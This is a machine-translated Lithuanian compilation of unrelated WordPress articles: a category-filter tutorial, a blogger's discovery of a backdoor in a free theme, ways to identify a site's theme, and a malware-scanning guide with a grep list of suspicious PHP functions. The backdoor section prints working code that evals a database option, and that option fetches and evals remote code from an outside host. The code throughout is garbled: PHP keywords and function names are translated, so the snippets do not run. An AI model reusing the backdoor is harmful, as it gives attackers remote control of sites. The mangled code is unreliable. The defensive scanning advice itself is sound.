Įsivaizduokime, kad rodote įrašus ir jums reikia pakeisti išvaizdą, priklausomai nuo kategorijos. Pavyzdžiui, turite bloką „Apie AUTORĮ“, kuriame rodoma informacija apie straipsnio autorių, tačiau šio bloko nenorite matyti, pavyzdžiui, po įrašais iš kategorijos, kurioje jis nereikalingas. Taip pat galite neleisti komentuoti tam tikrose kategorijose, rodyti miniatiūras ir pan. Viskas priklauso nuo jūsų poreikių ir fantazijų. Asmeniškai aš naudoju šią sąlygą labai dažnai.
Norėdami filtruoti įrašus pagal kategoriją, funkcija padės - in_category(). Ši funkcija patikrina, ar dabartinis ar nurodytas įrašas priklauso norimai kategorijai, ar kelioms kategorijoms. Dažniau šią funkciją išvestis faile vienas.php, nes jis yra atsakingas už įrašų išvedimą.
Paprasčiausias būdas naudoti funkciją atrodytų maždaug taip. Šį kodą pridedame prie single.php failo ir, jei reikia, įdedame į PHP žymas.
PHP žymos atrodo taip:
Jei jūsų temoje daugiausia naudojamas HTML kodas, įklijuokite toliau esantį kodą be pakeitimų. Jei daugiausia naudojate PHP, tada žymas, kuriose yra kodas, galima pašalinti.
Šiame kode nustatome sąlygą, kad jei dabartinis įrašas priklauso kategorijai, kurios ID - 12, tada turime kažką rodyti. Į garbanotas petnešas galite pridėti ką tik norite. Tai turėtų būti PHP kodas, jei sunku ir reikia pridėti HTML kodą, tada sulaužykite kodą su tomis pačiomis PHP žymomis ir kodas taps toks:
//čia rašome įprastą HTML kodą arba tiesiog tekstą.
Norėdami nustatyti kategorijos ID, turite eiti į kategorijų sąrašą administratoriaus skydelyje ir užveskite pelės žymeklį virš norimos. Naršyklės lango apačioje, dešinėje pusėje, bus nuoroda, kurios viduje bus kažkas panašaus į ID=1, tai yra, šios kategorijos ID yra 1.
Jei reikia nurodyti kelias kategorijas, nurodykite jas kableliais. Taip pat gali tekti sukurti sąlygą „IF – THEN“, tada kodas bus maždaug toks:
Įsivaizduokite, kad jums reikia rodyti miniatiūros įrašą 12 kategorijoje ir pirmąjį paveikslėlį iš teksto kituose įrašuose iš kitų kategorijų. Ar taip atsitinka ir kaip tai padaryti? Naudojant aukščiau pateiktą kodą. Apie pirmojo vaizdo iš įrašo rodymą galite perskaityti straipsnyje -
Dabar noriu parodyti dar vieną funkciją, kurią galima pridėti prie šios funkcijos. Pasitaiko, kad kategorijos turi subkategorijas, tai yra antrines kategorijas. Ir jei įrašas priklauso vienai iš subkategorijų, sąlyga ją aplenks. Jei jums to reikia, jums nereikia nieko liesti, bet jei vis dėlto sąlyga turėtų veikti subkategorijoms, tada prie sąlygos turite pridėti priedą. Pirmiausia prie pačios sąlygos turite pridėti šią dalį - || post_is_in_descendant_category(12). Tai iškvietimas į mūsų naują funkciją, kuri bus tikrinama pagal subkategorijas. Baigtas kodas atrodys taip:
Į nauja funkcija pradėjo veikti, reikia pridėti pačios šios funkcijos kodą, tai yra jį parašyti. Norėdami tai padaryti, raskite failą aplanke su aktyvia tema function.php, kurioje jie yra pasirinktines funkcijas. Jei nesate susipažinę su PHP, turite pridėti kodą pačioje failo pabaigoje, bet jei yra uždarymas PHPžyma - ?> , tada jį reikia pridėti prieš jį. Pats kodas atrodo taip:
Funkcija post_is_in_descendant_category($cats, $_post = null) ( foreach ((masyvas) $cats kaip $cat) ( // get_term_children() priima tik sveikojo skaičiaus ID $descendants = get_term_children((int) $cat, "category"); ($descendants && in_category($descendants, $_post)) return true;
Jei viskas bus padaryta teisingai, tada jūsų sąlyga parinks įrašus pagal tam tikras kategorijas ir jų subkategorijas.
Šį straipsnį pradėjau rašyti jau seniai, bet nespėjau jo pabaigti, iš pradžių vienas dalykas, o paskui kitas sutrukdė. Pagaliau straipsnis baigtas ir galbūt tai padės daugeliui žmonių išspręsti problemą.
Tai viskas, ačiū už dėmesį. 🙂
Sveiki, draugai. Ar esate tikri, kad nemokamas „WordPress“ šablonas, kurį naudojate savo svetainėms ir tinklaraščiams, yra tikrai saugus ir jame nėra paslėptų grėsmių ar kenkėjiško kodo? Ar esate visiškai tuo tikras? Tikrai?)
Manote, kad paleidote šabloną, pašalinote iš jo paslėptas nuorodas ir darbas atliktas. Reguliariai nuskaitote svetainės failus naudodami antivirusinę programą, peržiūrėkite „Yandex“ žiniatinklio valdytojo įrankius skirtuke „Sauga“ ir jaučiatės palengvėję, kai pamatysite pranešimą: „ Kenkėjiško kodo svetainėje neaptikta«.
Taip ir as galvojau. Nenorėčiau tavęs nuliūdinti, bet...
Paslėptas pavojingas kodas nemokamuose „WordPress“ šablonuose
Tai laišką, kurį praėjusią savaitę gavau el. paštu iš savo prieglobos įmonės. Neseniai jie pradėjo reguliariai tikrinti visus svetainės failus, kad ieškotų kenkėjiško turinio, ir jie rado šį turinį pas mane!
Viskas prasidėjo, kai vieną popietę nuėjau į savo svetainę ir negalėjau jos paleisti – pasirodė įžeidžiantis pranešimas apie tai, kad failai su plėtiniu php nerasta. Šiek tiek įsitempęs nuėjau patyrinėti aplanko su prieglobos svetaine turinio ir iškart aptikau problemą – mano šablono failas fuctions.php buvo pervadintas į functions.php.malware, o tai tarsi dviprasmiškai užsiminė – buvo antivirusinė programa. dirbu čia ar panašiai) Nuėjęs į paštą radau aukščiau pateiktą prieglobos šeimininko ataskaitą.
Pirmas dalykas, kurį padariau, žinoma, buvo patikrinti šį failą, studijavo jos turinį, nuskenavo visokiais antivirusais, dešimtimis internetines paslaugas tikrinti, ar nėra virusų ir pan. — galiausiai nieko nerasta, visi vienbalsiai tvirtino, kad byla visiškai saugi. Žinoma, aš išreiškiau savo abejones šeimininkui, sakydamas, kad kažką supainiojote, bet tik tuo atveju paprašiau pateikti ataskaitą apie kenkėjiškos kodo dalies aptikimą.
Ir štai ką jie man atsakė
Nuėjau į google informaciją apie šį kodą ir rimtai pagalvojau...
Kaip šablone rasti kenkėjiško kodo dalį
Kaip paaiškėjo, tai tikrai nebanali technika, leidžianti suinteresuotoms šalims perduoti duomenis į jūsų svetainę ir keisti puslapių turinį be jūsų žinios! Jei naudojate nemokamą šabloną, tada Labai rekomenduoju patikrinti, ar funkcijos.php yra toks kodas:
add_filter('the_content', '_bloginfo', 10001);
funkcija _bloginfo($content)(
pasaulinis $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
grąžinti $ co;
) else return $turinys;
}
Net ir turint labai menkas PHP žinias, aišku, kad kuriamas tam tikras filtras, susietas su visuotiniu kintamuoju įrašu ir turiniu, kurie yra atsakingi už turinio rodymą tik tinklaraščio įrašų puslapiuose (sąlyga is_single). Jau įtartina, ar ne? Na, o dabar pažiūrėkime, koks šis kodas bus rodomas mūsų svetainėje.
Duomenų bazėje prašoma įdomi parinktis tinklaraščio parinktis taip pat atrodo labai įtartinai. Eikime į mūsų duomenų bazę MySQL duomenys ir suraskite ten lentelę pavadinimu wp_options, jei nepakeitėte priešdėlių, tada ji pagal nutylėjimą atrodys taip. Ir joje randame mus dominančią eilutę, vadinamą blogoption
Koks grožis! Matome tokią parinktį
return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));
Tie. Iš tam tikros svetainės (ir rusiškos, atminkite) jie grąžina turinį, kuriame gali būti bet kas! Bet koks nuorodų skaičius, kenkėjiški kodai, pakeistas tekstas ir kt. Kai prisijungiate prie pačios svetainės, pateikiama 403 prieigos klaida, o tai nenuostabu. Žinoma, šią parinktį taip pat pašalinau iš duomenų bazės.
Remiantis nukentėjusiųjų informacija, tikslus jūsų straipsnio turinys paprastai grąžinamas tik vienu pakeitimu - vietoj bet kurio taško „“. atvira nuoroda buvo paslėpta tekste! Ir, beje, ši parinktis įrašoma į duomenų bazę, kai įdiegiamas pats šablonas, o tada sėkmingai tai darantis kodas savaime sunaikinamas. Ir aš gyvenau su tokiomis šiukšlėmis dvejus metus ir per visą tą laiką man šios grėsmės nenustatė nei viena antivirusinė, nei paslauga. Tiesą sakant, nepastebėjau, ar šis triukas man kada nors pasiteisino, ar mano saugos įskiepis užblokavo šią funkciją (o gal vienas iš „WordPress“ atnaujinimų uždarė šią spragą), bet vis tiek nemalonu.
Moralas apie nemokamą sūrį
Kaip jums patinka mūsų šablonų „vertėjų“ (arba tų, kurie skelbia juos savo kataloguose) rafinuotumas? Tai ne jums, kad iškirptumėte nuorodas iš poraštės) Gaila, kad nepamenu, iš kur atsisiunčiau savo šabloną, tai buvo seniai, kitaip tikrai būčiau parašęs keletą meilių. Ir jei tuo metu turėčiau tą pačią patirtį, kurią turiu dabar, tikrai nebūčiau pasinaudojusi nemokamas šablonas, arba kraštutiniu atveju aš neatsisiųsčiau iš nežinomų šaltinių!
Lengviau nusipirkti kokį oficialų premium šabloną už 15-20 dolerių ir gyventi ramiai žinant, kad jame nėra jokių skylių ar šifruotų nuorodų, o net jei yra pažeidžiamumų, kūrėjai tikrai išleis atnaujinimą, kuriame šios skylės bus uždaryta. ( Beje, Artemas neseniai paskelbė straipsnį, kuriame kalba apie aukščiausios kokybės šablonus ir netgi dalija reklaminius kodus, skirtas žiaurioms nuolaidoms tiems, kurie domisi.)
Ar kada nors susimąstėte, kokia tema naudojama svetainėje?
Dažnai ieškodami idealios temos žiūrime į kitus įgyvendintus projektus, norėdami rasti kažką panašaus arba sukurti savo svetainę ta pačia tema, tik su savo individualiu dizainu.
Šioje pamokoje parodysime, kokius įrankius ir gudrybes galite naudoti norėdami sužinoti, kokia tema naudojama jūsų „WordPress“ svetainėje.
1 būdas. IsItWP patvirtinimo svetainė
Paprasčiausias būdas yra apsilankyti isitwp.com ir peržiūrėti jus dominančią svetainę.
Tai internetinis įrankis, kuris parodys, kokią temą naudoja „WordPress“ ir ar „WordPress“ netgi naudojama toje svetainėje.
Jei svetainėje veikia „WordPress“, IsItWP bandys išsiaiškinti dabartinės temos pavadinimą.
Taip pat bus bandoma išsiaiškinti, kokie aktyvūs įskiepiai naudojami svetainėje:
Jei jums pasisekė ir tai nėra pritaikyta ar vaikų tema, IsItWP parodys savo pavadinimą ir šią temą galėsite rasti paieškos sistemose.
2 būdas. Nustatykite rankiniu būdu
Kartais svetainių savininkai ar kūrėjai pakeičia vietinės „WordPress“ temos pavadinimą. Tokiu atveju tokie įrankiai kaip IsItWP negalės jums padėti.
Bet net jei taip, svetainės kode vis tiek gali būti įvairių užuominų, kurios padės išsiaiškinti, kokia tema įdiegta.
Pažiūrėkime.
Kiekviena „WordPress“ tema turi turėti failą stilius.css. Šio failo viduje yra antraštė, kurioje paprastai nurodomas temos pavadinimas, temos autorius, versija ir temos kūrėjo svetainė. Jame taip pat pateikiami kiti CSS stiliaus šablonai, kuriuos naudoja tema.
Norėdami rasti šį failą, pirmiausia turite eiti į pačią svetainę. Spustelėkite dešiniuoju pelės mygtuku spustelėkite kur nors pagrindiniame puslapyje ir eikite peržiūrėti pirminis kodas (Rodyti puslapio šaltinį).
Šaltinio kodas bus atidarytas naršyklėje naujame skirtuke. pagrindinis puslapis svetainę.
Dabar reikia rasti kodo eilutę, kuri atrodo maždaug taip:
Kad būtų lengviau atlikti užduotį, galite ieškoti šiame skirtuke naudodami fragmento kodą " temos". Tai dalis iš katalogo, kuriame stilius.css.
Taip rasite kelią, kuriame yra style.css failas, ir galėsite atidaryti šį failą tiesiai naršyklėje naujame skirtuke.
Style.css viršuje bus antraštė su pavadinimu (apie kurią kalbėjome aukščiau). Tai paslaugų informacija apie dizaino temą. Tai atrodo maždaug taip:
/* Temos pavadinimas: Temos pavadinimas Temos URI: https://example.com Autorius: ThemeAuthorName Autoriaus URI: https://example.com Aprašymas: Mano tema yra lanksti „WordPress“ tema, skirta portfelio svetainėms Versija: 1.1.47 Licencija: GNU General Public License v2 arba naujesnė licencijos URI: http://www.gnu.org/licenses/gpl-2.0.html Teksto domenas: hestia Žymos: dienoraštis, pasirinktinis logotipas, aplankas, el. prekyba, rtl-language-support , vėlesni formatai, tinklelio išdėstymas, vieno stulpelio, dviejų stulpelių, tinkintas fonas, tinkintos spalvos, tinkinta antraštė, pasirinktinis meniu, paryškinto vaizdo antraštė, paryškinti vaizdai, lanksti antraštė, viso pločio -šablonas, lipnus įrašas, temos parinktys, komentarai su gijomis, paruošta vertimui */
Iš šio bloko galite sužinoti temos pavadinimą ir kūrėjo adresą. Tada belieka susirasti šią temą internete.
3 būdas. Kaip rasti pagrindinę temą
Daugelis svetainių naudoja vaikų temas, kad pritaikytų jų išvaizdą. Ir tai yra visiškai teisingas požiūris.
Šiuo atveju, jei radote failą stilius.css iš antrinės temos, jos antraštėje bus informacija apie pirminę temą:
/* Temos pavadinimas: Mano vaikas Temos aprašymas: Tiesiog vaiko tema Autorius: Peteris Smithas Autoriaus URL: Įrašykite čia autoriaus tinklaraščio arba svetainės URL Šablonas: hestia Versija: 1.0 Licencija: GNU bendroji viešoji licencija v2 arba naujesnė Licencijos URI: http :/ /www.gnu.org/licenses/gpl-2.0.html Teksto domenas: my-child-theme */
Aukščiau pateiktame pavyzdyje pagrindinė tema nurodoma parametru " Šablonas“, tai reiškia, kad šioje vaikų temoje naudojama pagrindinė tema „Hestia“.
Taip pat galite sužinoti apie pirminę temą iš šaltinio kodo, aprašyto 2 metode. Kode rasite nuorodą į style.css failą ne tik iš antrinės, bet ir iš pagrindinės temos.
Tačiau nepamirškite, kad kūrėjas gali pabandyti pakeisti visas style.css antraštes į savo, tokiu atveju bus labai sunku nustatyti pradinę temą.
WordPress yra populiariausias įvairių informacinių svetainių ir tinklaraščių kūrimo variklis. Jūsų svetainės saugumas yra daugiau nei jūsų duomenų saugumas. Tai daug svarbiau, nes tai taip pat yra visų vartotojų, kurie skaito ir pasitiki jūsų šaltiniu, saugumas. Štai kodėl taip svarbu, kad svetainė nebūtų užkrėsta virusais ar kitu kenkėjišku kodu.
Viename iš šių straipsnių apžvelgsime, kaip apsaugoti „WordPress“ nuo įsilaužimo, tačiau dabar noriu jums pasakyti, kaip patikrinti, ar „WordPress“ svetainėje nėra virusų ir kenkėjiškas kodas kad viskas būtų saugu.
Pirmas variantas, kuris ateina į galvą, yra tai, kad buvote įsilaužę įsilaužėlių ir į savo svetainės kodą įdėjote užpakalines duris, kad galėtumėte siųsti šlamštą, įdėti nuorodas ir kitus blogus dalykus. Taip nutinka kartais, tačiau tai yra gana retas atvejis, jei programinę įrangą atnaujinate laiku.
Yra tūkstančiai nemokamų „WordPress“ temų ir įvairių papildinių, ir tai jau gali kelti grėsmę. Vienas dalykas, kai atsisiunčiate šabloną iš „WordPress“ svetainės, ir visai kas kita, kai jį randate kairėje svetainėje. Nesąžiningi kūrėjai į savo produktus gali įterpti įvairius kenkėjiškus kodus. Rizika dar didesnė, jei nemokamai atsisiunčiate aukščiausios kokybės šablonus, kur įsilaužėliai, niekuo nerizikuodami, gali pridėti tam tikrą saugumo spragą, pro kurią jie gali prasiskverbti ir padaryti tai, ko reikia. Štai kodėl taip svarbu patikrinti, ar „WordPress“ svetainėje nėra virusų.
Tikrinama, ar „WordPress“ svetainėje nėra virusų
Pirmas dalykas, į kurį reikia kreiptis tikrinant svetainę, nėra virusai, tai yra „WordPress“ papildiniai. Greitai ir paprastai galite nuskaityti savo svetainę ir rasti įtartinas kodo sritis, į kurias verta atkreipti dėmesį, nesvarbu, ar jos yra temoje, papildinyje ar pačiame pagrindiniame Wodpress. Pažvelkime į kelis populiariausius papildinius:
1.TOC
Šis labai paprastas papildinys patikrina visas svetainėje įdiegtas temas, ar jose nėra kenkėjiško kodo. Papildinys aptinka paslėptas nuorodas, užšifruotas naudojant base64 kodo įterpimą, taip pat rodo išsamią informaciją apie rastas problemas. Dažniausiai aptiktos kodo dalys nėra virusai, tačiau gali būti potencialiai pavojingi, todėl turėtumėte į jas atkreipti dėmesį.
Atviras "Išvaizda" -> "TAC" tada palaukite, kol visos temos bus patikrintos.
2. VIP skaitytuvas
Labai panašus į TOC skaitytuvą temoms, bet išveda daugiau Detali informacija. Tos pačios galimybės aptikti nuorodas, paslėptą kodą ir kitus kenkėjiškus intarpus. Tiesiog atidarykite VIP skaitytuvo elementą įrankių skiltyje ir išanalizuokite rezultatą.
Gali pakakti pašalinti papildomų failų pvz., darbalaukis.ini. Arba reikia išsamiau pažiūrėti, kas vyksta failuose naudojant base64.
3. Anti-Malware iš GOTMLS.NET
Šis papildinys leidžia ne tik nuskaityti svetainės temas ir šerdį, ar nėra virusų, bet ir apsaugoti svetainę nuo žiaurios jėgos slaptažodžių bei įvairių XSS, SQLInj atakų. Paieška atliekama pagal žinomus parašus ir pažeidžiamumą. Kai kuriuos pažeidžiamumus galima pataisyti vietoje. Norėdami pradėti nuskaityti failus, atidarykite „Anti-Malvare“šoniniame meniu ir spustelėkite „Paleisti nuskaitymą“:
Kad galėtumėte paleisti nuskaitymą, turite atnaujinti parašų duomenų bazes.
4. Wordfence
Tai vienas populiariausių „WordPress“ saugos ir kenkėjiškų programų nuskaitymo papildinių. Išskyrus skaitytuvą, kuriame galima rasti daugumą žymių WordPress kodas, yra nuolatinė apsauga nuo įvairių tipų atakų ir slaptažodžių brutalios jėgos. Paieškos metu įskiepis randa galimų problemų su įvairiais papildiniais ir temomis, praneša, kad reikia atnaujinti „WordPress“.
Atidarykite skirtuką „WPDefence“šoniniame meniu ir eikite į skirtuką "Nuskaityti" ir paspauskite "Pradėti nuskaitymą":
Nuskaitymas gali šiek tiek užtrukti, bet baigę pamatysite išsamią rastų problemų ataskaitą.
5. Antivirusinė
Tai dar vienas paprastas papildinys, kuris nuskaitys jūsų svetainės šabloną, ar nėra kenkėjiško kodo. Trūkumas yra tas, kad nuskaitomas tik dabartinis šablonas, tačiau informacija rodoma pakankamai išsamiai. Pamatysite visas pavojingas funkcijas, kurios yra temoje, ir galėsite išsamiai išanalizuoti, ar jos nekelia pavojų. Raskite prekę "Antivirus" nustatymuose ir spustelėkite „Nuskaityti temų šablonus dabar“:
6. Vientisumo tikrintuvas
Taip pat patartina patikrinti WordPress failų vientisumą, jei virusas jau kur nors užsirašė. Tam galite naudoti Integrity Checker papildinį. Jis tikrina visus pagrindinius, papildinių ir šablonų failus, ar nėra pakeitimų. Nuskaitymo pabaigoje pamatysite informaciją apie pakeistus failus.
Internetinės paslaugos
Taip pat yra keletas internetinių paslaugų, kurios leidžia patikrinti, ar „WordPress“ svetainėje nėra virusų, arba patikrinti tik šabloną. Štai keletas iš jų:
themecheck.org- atsisiunčiate temų archyvą ir matote visus įspėjimus apie jame naudojamas galimas kenkėjiškas funkcijas. Galite ne tik peržiūrėti informaciją apie savo temą, bet ir apie kitas kitų vartotojų įkeltas temas, taip pat skirtingos versijos Temos. Kad ir ką randa papildiniai, galite rasti šioje svetainėje. Taip pat labai svarbu patikrinti „WordPress“ temą.
virustotal.com- gerai žinomas šaltinis, kuriame galite patikrinti, ar svetainėje ar šablono faile nėra virusų.
ReScan.pro- WordPress svetainės virusų nuskaitymas naudojantis šia paslauga atliekama statinė ir dinaminė analizė, siekiant aptikti galimus peradresavimus; Tikrina svetainę pagal įvairius juoduosius sąrašus.
sitecheck.sucuri.net- paprasta paslauga, skirta nuskaityti svetaines ir temas dėl virusų. Yra „WordPress“ papildinys. Aptinka pavojingas nuorodas ir scenarijus.
Rankinis patikrinimas
Nieko negali būti geriau už rankinį patikrinimą. Linux turi šią nuostabią grep programą, leidžiančią ieškoti atsitiktinių eilučių aplanke su failais. Belieka suprasti, ko mes ieškosime:
eval - ši funkcija leidžia vykdyti savavališką PHP kodą, jo nenaudoja save gerbiantys produktai, jei vienas iš įskiepių ar temos naudoja šią funkciją, yra beveik 100% tikimybė, kad jame yra virusas;
- base64_decode- šifravimo funkcijas galima naudoti kartu su eval, norint paslėpti kenkėjišką kodą, tačiau jos gali būti naudojamos ir taikiems tikslams, todėl būkite atsargūs;
- sha1- kitas kenkėjiško kodo šifravimo būdas;
- gzinflate- suspaudimo funkcija, tie patys tikslai, kartu su eval, pavyzdžiui, gzinflate(base64_decode(kodas);
- strrev- pasuka eilutę atgal ne anksčiau, nes primityviam šifravimui gali būti naudojama parinktis;
- spausdinti- išveda informaciją į naršyklę, kartu su gzinflate arba base64_decode yra pavojinga;
- failo_įdėjimo_turinys- Pati WordPress arba papildiniai vis tiek gali sukurti failus failų sistemoje, tačiau jei tema tai daro, turėtumėte būti atsargūs ir patikrinti, kodėl ji taip daro, nes gali būti įdiegta virusų;
- file_get_contents- dažniausiai naudojamas taikiems tikslams, tačiau gali būti naudojamas kenkėjiškam kodui parsisiųsti arba informacijai iš failų nuskaityti;
- garbanoti- ta pati istorija;
- fopenas- atidaro failą rašymui, niekada nežinai, kokiu tikslu;
- sistema- funkcija vykdo komandą Linux sistema, jei tai daro pats tema, papildinys ar wordpress, greičiausiai yra virusas;
- simbolinė nuoroda- sukuria simbolines nuorodas sistemoje, galbūt virusas bando padaryti pagrindinę Failų sistema prieinama iš išorės;
- kopija- kopijuoja failą iš vienos vietos į kitą;
- getcwd- grąžina esamo darbo katalogo pavadinimą;
- cwd- pakeičia esamą darbo aplanką;
- ini_get- gauna informaciją apie PHP nustatymus, dažnai taikiais tikslais, bet niekada negali žinoti;
- error_reporting(0)- išjungia bet kokių klaidų pranešimų išvedimą;
- window.top.location.href- javascript funkcija, naudojama peradresavimui į kitus puslapius;
- nulaužtas- Taigi, tik tuo atveju, mes patikriname, staiga įsilaužėlis nusprendė mums pasakyti.
Kiekvieną atskirą žodį galite pakeisti tokia komanda:
grep -R "nulaužtas" /var/www/path/to/files/wordpress/wp-content/
Arba naudokite paprastą scenarijų, kuris ieškos visų žodžių vienu metu:
value="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopija (
eval (
sistema (
simbolinė nuoroda (
error_reporting(0)
spausdinti
file_get_contents(
file_put_contents(
fopen (
nulaužtas"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *
Ten, kur yra svetainė, gali būti virusų. Ši paprasta tiesa neleidžia atsipalaiduoti ir reikalauja nuolat stebėti svetainės „sveikatą“. „WordPress“ svetainės nėra išimtis, ir jei atsižvelgsite į populiarumą TVS WordPress, aišku, kodėl šiose vietose užsikrečiama dažniau nei kitų sistemų svetainėse. Yra daug įrankių, skirtų svetainių antivirusiniam nuskaitymui. Šiame straipsnyje kalbėsiu apie puikų kovotoją su virusais „WordPress“ svetainėms - „AntiVirus“ papildinį, kaip rasti ir pašalinti virusą WordPress įskiepis Antivirusinė.
Ką reiškia virusas svetainėje?
Virusas svetainėje reiškia bet kokį trečiosios šalies programa, kuri priverčia svetainę veikti, o ne taip, kaip numatyta sistemos programose. Viruso apibrėžimas apima:
- , nurodytas svetainėje;
- Šifruotos vykdomosios funkcijos, kurios patenka į svetainę su papildiniais ir temomis;
- Bet koks php scenarijus ir Java kodai, atliekantys svetainės savininkui nežinomus veiksmus.
Virusų poveikis svetainėje gali būti labai įvairus:
- Nuorodos į trečiųjų šalių išteklius;
- Automatinis peradresavimas į kitų žmonių išteklius;
- Naujų leidinių skaitymas ir jų publikacijų kopijavimas trečiųjų šalių šaltiniuose;
- Neleistina reklama svetainėje;
- Svetainės kodo sunaikinimas ir dėl to svetainė sugenda.
Antivirusinio papildinio įdiegimas ir konfigūravimas
Puikus įrankis patikrinti, ar svetainėje nėra virusų Antivirusinis papildinys. Įskiepis atsiųstas daugiau nei 90 000, paskutinį kartą išbandytas naudojant 4.6.11 versijos WordPress.
Papildinį galite įdiegti iš svetainės konsolės, skirtuke Papildiniai → Pridėti naują, naudodami papildinio paieškos formą pagal pavadinimą.
Įdiekite antivirusinį papildinį iš administracinio skydelio
Kaip pašalinti virusą iš „WordPress“ naudojant antivirusinį papildinį
Svarbu!
Prieš pradėdami dirbti su papildiniu. Papildinys veikia be jokių gudrybių. Per Nustatymai → Antivirusinė programa arba Papildiniai → Antivirusinė programa → Nustatymai
eikite į suaktyvinto papildinio puslapį. Spustelėkite „Nuskaityti temos šablonus“ ir peržiūrėkite nuskaitymo rezultatą. Visi darbo temų katalogai atsispindės puslapyje.Žalia spalva
reiškia virusų nebuvimą, raudona spalva rodo infekciją.
